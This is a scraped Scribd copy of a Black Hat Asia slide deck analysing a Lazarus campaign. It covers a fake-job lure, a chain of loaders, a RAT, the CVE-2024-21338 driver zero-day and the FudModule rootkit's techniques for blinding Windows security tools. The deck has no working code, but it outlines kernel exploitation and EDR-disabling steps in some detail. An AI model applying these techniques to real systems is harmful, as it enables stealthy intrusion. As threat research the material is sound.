Scribd
Upload
47 views33 pages

BYOVD 0day

Pdf for stdy

Uploaded by

mn0361131
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
47 views33 pages

BYOVD 0day

Pdf for stdy

Uploaded by

mn0361131
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 33

From BYOVD to a 0-day:Unveiling Advanced Exploits inCyber Recruiting

Scams
Speakers: Luigino Camastra, Igor Morgenstern
Contributor: Jan Vojtesek

#BHASIA @BlackHatEvents
Agenda
• Introduction to prior research
• Attack chain analysis
• Initial ISO image
• Loaders
• RAT
• 0-day and vulnerability analysis
• Rootkit analysis

# BHASIA @BlackHatEvents
Prior research

# BHASIA @BlackHatEvents
Attack chain analysis
• The attack is initiated by presenting a fabricated job offer
• Contacting via LinkedIn, WhatsApp, email or other platforms

# BHASIA @BlackHatEvents
Attack chain analysis
RollFling Loader

• Shellcode executed in memory


• Discovered a new loader we called RollFling and NLS file
• Malicious DLL established as a service
• Kickstart execution chain
• Loading next stage
• obtaining XOR key by calling GetSystemFirmwareTable API
• XOR decryption of file with .nls extension
• RollSling loader is encrypted in NLS file
• Loading decrypted RollSling into memory

# BHASIA @BlackHatEvents
Attack chain analysis
• RollSling is a loader discussed in Microsoft research (Multiple North Korean threat actors exploiting the TeamCity
CVE-2023-42793 vulnerability)
• Code similarities with the RollSling version discussed in the Microsoft research

Microsoft Gen Digital


d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f
# BHASIA @BlackHatEvents
Attack chain analysis
RollSling Loader

• Locate binary blob


• Holds various stages and configuration data
• RollMid, 2x DLL binaries and address of C&C server
• Located without file extension
• Extracting the next stage from binary blob
• Searching for export function "StartAction"
• Loading and executing the next stage RollMid
• (by calling "StartAction" export function)

# BHASIA @BlackHatEvents
Attack chain analysis
RollMid Loader

• Loading network module binary, parsing address of the C&C


server
• Obtaining HTML file from the First C&C server
• Get PNG image from the Second C&C server
• Steganography to extract the address of the Third C&C
server
• Sending POST req to get Data Blob
• Data blob contains configuration data for next stage
• Appends part of Data Blob to the KaolinRAT DLL on disk as
an overlay
• Loading and executing next stage, called Kaolin RAT

# BHASIA @BlackHatEvents
Attack chain analysis
Kaolin RAT

• Communication with C&C server


• Network module DLL binary
• Encrypted with AES
• Custom RAT
• File compression capabilities
• Uploading file to C&C
• Changing file's last write timestamp
• Downloading a DLL file from C&C server and loading it in a memory
• Loading exploit with a FudModule rootkit

# BHASIA @BlackHatEvents
Living Off the Land: Vulnerable Drivers

Benefits Obstacles Techniques


• Disrupt security software • DSE (Driver Signature • Data-only attacks
• Hide indicators of Enforcement) • Signed Malicious Drivers
infection • HVCI • Vulnerable Drivers
• Disable kernel-mode • SMEP
telemetry

# BHASIA @BlackHatEvents
Living Off the Land: Vulnerable Drivers

N-Day BYOVD Zero-Day BYOVD Zero-Day OS


• Easy to pull off • Attacker needs to discover a • Abuse built-in Windows
• Lazarus previously abused zero-day vulnerability drivers
dbutil_2_3.sys (Dell), • Stealthier than n-day • Reduced attack surface
ene.sys (ENE Technology • hw.sys exploited by Candiru • Highest level of stealth
Inc.) • Generates suspicious event
• Straightforward to detect

# BHASIA @BlackHatEvents
CVE-2024-21338
• Vulnerable IOCTL dispatcher in appid.sys
(AppLocker)
• Allows calling arbitrary kernel function
• Partial control of the first argument
• SMEP prevents calling user-mode code
• kCFG requires a valid kCFG call targets
• IOCTL is exposed through \Device\AppId
• User should be running as LOCAL SERVICE

# BHASIA @BlackHatEvents
CVE-2024-21338 - exploitation
• Load the driver by writing an event to AppLocker-
related ETW provider
• Impersonates the LOCAL SERVICE account
• Write primitive to change PreviousMode of the
current thread
• Can read and write arbitrary kernel memory
with NtWriteVirtualMemory
• Fixed by introducing ExGetPreviousMode check

# BHASIA @BlackHatEvents
FudModule 2.0
• Data-only rootkit (user space)
• DKOM Techniques
• 0x1 - Registry Callbacks
• 0x2 - Object Callbacks (no update)
• 0x4 - Process, Thread, and Image Kernel Callbacks
• 0x8 - File System MiniFilters
• 0x10 - Windows Filtering Platform
• 0x40 - Event Tracing for Windows: System Loggers
• 0x80 - Event Tracing for Windows: Provider GUIDs
• 0x100 - Image Verification Callbacks
• 0x200 - Direct Attacks on Security Software

# BHASIA @BlackHatEvents
FudModule 2.0
0x01 – Registry Callbacks

• Allow drivers to monitor and respond to changes in the registry


• Registered via CmRegisterCallbackEx
• DKOM
• Resolve CmUnRegisterCallback (export of ntoskrnl)
• Scanning function for lea rcx,[nt!CallbackListHead]
• Find the address of nt!CallbackListHead
• New - Skip callbacks from ntoskrnl.exe,
applockerfltr.sys, bfs.sys
• Replace callback with ObIsKernelHandle and unlink the
callback entry

# BHASIA @BlackHatEvents
FudModule 2.0
0x02 – Object Callbacks - no update

• Monitor and respond to thread, process, and desktop


handle operations
• Registered via ObRegisterCallbacks
• DKOM
• Resolve ObGetObjectType (export of ntoskrnl)
• Find nt!ObTypeIndexTable
• Nt!ObTypeIndexTable is an array of pointers to
_OBJECT_TYPE structures
• Iterate over CallbackList
• Make each point to itself

# BHASIA @BlackHatEvents
FudModule 2.0
0x04 - Process, Thread, and Image Kernel Callbacks
• Registered via
• PsSetCreateProcessNotifyRoutine
• PsSetCreateThreadNotifyRoutine
• PsSetLoadImageNotifyRoutine
• DKOM
• Resolve nt!PspNotifyEnableMask,
nt!Psp(LoadImage|CreateThread|CreateProcess)Noti
fyRoutine
• Clear nt!PspNotifyEnableMask Whitelisted modules
• Create new arrays containing callbacks
ntoskrnl.exe ahcache.sys mmcss.sys cng.sys
from whitelisted modules
• Revert nt!PspNotifyEnableMask ksecdd.sys tcpip.sys iorate.sys ci.dll
dxgkrnl.sys peauth.sys wtd.sys

# BHASIA @BlackHatEvents
FudModule 2.0
0x08 – Minifilter Drivers
• Mechanism for drivers to intercept file system operations
• HVCI prevents patching the filter function
• Iterates over _FLT_VOLUME.Callbacks.OperationsLists
• Indexed by IRP major function codes
• An array of linked lists of FLTMGR!_CALLBACK_NODE

# BHASIA @BlackHatEvents
FudModule 2.0
0x08 – Minifilter Drivers
• Mechanism for drivers to intercept file system operations
• HVCI prevents patching the filter function
• Iterates over _FLT_VOLUME.Callbacks.OperationsLists
• Indexed by IRP major function codes
• An array of linked lists of FLTMGR!_CALLBACK_NODE

# BHASIA @BlackHatEvents
FudModule 2.0
0x08 – Minifilter Drivers
• Mechanism for drivers to intercept file system operations
• HVCI prevents patching the filter function
• Iterates over _FLT_VOLUME.Callbacks.OperationsLists
• Indexed by IRP major function codes
• An array of linked lists of FLTMGR!_CALLBACK_NODE

# BHASIA @BlackHatEvents
FudModule 2.0
0x08 – Minifilter Drivers
• Mechanism for drivers to intercept file system operations
• HVCI prevents patching the filter function
• Iterates over _FLT_VOLUME.Callbacks.OperationsLists
• Indexed by IRP major function codes
• An array of linked lists of FLTMGR!_CALLBACK_NODE

# BHASIA @BlackHatEvents
FudModule 2.0
0x10 – Windows Filtering Platform (WFP)

• Network traffic filtering


• Packet inspection

• Checks for Kaspersky drivers


• Locate netio!gWfpGlobal
• Iterate over the array of CALLOUT structs
• Set FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW
• Call the callout function only if there is a context
associated with the data flow

# BHASIA @BlackHatEvents
FudModule 2.0
0x40 – Event Tracing for Windows System Loggers

• High-performance mechanism for tracing and


logging events
• Zeroing out EtwpActiveSystemLoggers

# BHASIA @BlackHatEvents
FudModule 2.0
0x80 – Event Tracing for Windows: Provider GUIDs

• Contains a hardcoded list of 95 GUIDs


• Zero out four masks, namely
EnableMask, GroupEnableMask,
HostEnableMask, and
HostGroupEnableMask

# BHASIA @BlackHatEvents
# BHASIA @BlackHatEvents
FudModule 2.0
0x100 – Image Verification Callbacks
• Invoked whenever a new driver Image is
loaded into a kernel memory
• Useful functionality for anti-malware software
to block malicious or vulnerable drivers
• SeRegisterImageVerificationCallback
(registering callback)

# BHASIA @BlackHatEvents
FudModule 2.0
0x100 – Image Verification Callbacks
• Invoked whenever a new driver Image is
loaded into a kernel memory
• Useful functionality for anti-malware software
to block malicious or vulnerable drivers
• SeRegisterImageVerificationCallback
(registering callback)

# BHASIA @BlackHatEvents
FudModule 2.0 struct _EPROCESS
{
0x200 – Direct Attacks on Security Software struct _KPROCESS Pcb;
struct _EX_PUSH_LOCK ProcessLock;
• _EPROCESS of asdsvc.exe (AhnLab Smart Defense VOID* UniqueProcessId;
Service) struct _LIST_ENTRY ActiveProcessLinks;
• Targeting security solutions: AhnLab V3 Endpoint struct _EX_RUNDOWN_REF RundownProtect;
Security ...
struct _EJOB* ServerSilo;
• This modification makes it just a regular non- UCHAR SignatureLevel;
protected process UCHAR SectionSignatureLevel;
• Its opened up for further attacks from user mode struct _PS_PROTECTION Protection;
• Disrupt the link between user-mode and kernel- UCHAR HangCount:3;
mode components UCHAR GhostCount:3;
UCHAR PrefilterException:1;

...
}

# BHASIA @BlackHatEvents
FudModule 2.0
0x200 – Direct Attacks on Security Software
• This is used to increase stability
• Leaks its own _EPROCESS structure
• Zeroes out MitigationFlags
• Clears “EnableHandleExceptions” flag from
“_EPROCESS.ObjectTable.Flags”

# BHASIA @BlackHatEvents
FudModule 2.0
0x200 – Direct Attacks on Security Software
• What is the Handle Table used for?
• Kernel must be able to translate the handle to the
corresponding object

# BHASIA @BlackHatEvents
FudModule 2.0
0x200 – Direct Attacks on Security Software
• Create a dummy thread with “THREAD_ALL_ACCESS”
rights
• Modifying ObjectPointerBits
• This will make the handle reference that arbitrary object
and enable the rootkit to perform a privileged operations
on it
• Target _EPROCESS structure on one of the targeted
processes MsSense.exe(Windows Defender),
MsMpEng.exe (Malware Protection
Engine),CSFalconService.exe (CrowdStrike), Hmpalert.exe
(HitmanPro)
• Suspending process and all threads for targeted processes

# BHASIA @BlackHatEvents
Conclusion

• Lazarus group is investing significant


resources
• Despite various mitigations, the
kernel-based security solutions
remain vulnerable
• Lazarus despite sophisticated attacks
is still using phishing as an infection
vector

# BHASIA @BlackHatEvents
Thank you

#BHASIA @BlackHatEvents

You might also like